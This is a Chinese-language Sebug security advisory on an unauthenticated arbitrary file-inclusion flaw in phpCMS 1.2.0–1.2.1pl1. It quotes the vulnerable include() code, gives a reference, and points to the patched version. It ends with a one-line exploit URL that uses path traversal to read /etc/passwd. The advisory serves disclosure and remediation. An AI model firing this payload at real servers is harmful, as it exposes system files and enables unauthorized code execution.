phpCMS 1.2.x任意文件包含漏洞

SEBUGID:SSD-20081014147

Published:2005-06-03

Submit Info:admin (s1_at_sebug.net)

Vulnerable:

phpCMS phpCMS 1.2.1pl1
phpCMS phpCMS 1.2.1
phpCMS phpCMS 1.2.0

Discription:

phpCMS是灵活、高效的内容管理系统。

phpCMS中存在服务器端任意文件包含漏洞，起因是在进行会话检查前调用了include语句。远程攻击者可以未经认证利用这个漏洞执行任意代码。

有漏洞的include调用位于class.layout_phpcms.php中：

if(isset($_GET['language']) && $_GET['language'] != '') {
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]

<*References

sk0L （bmu@sec-consult.com）
http://marc.theaimsgroup.com/?l=bugtraq&m=111773774916907&w=2

SEBUG Solution:

phpCMS
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载phpCMS 1.2.1pl2：

http://www.phpcms.de/download/

Exploit:

[www.sebug.net]
The following procedures (methods) may contain something offensive，they are only for security researches and teaching , at your own risk!

http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd

// Sebug.net [ 2008-10-05 ]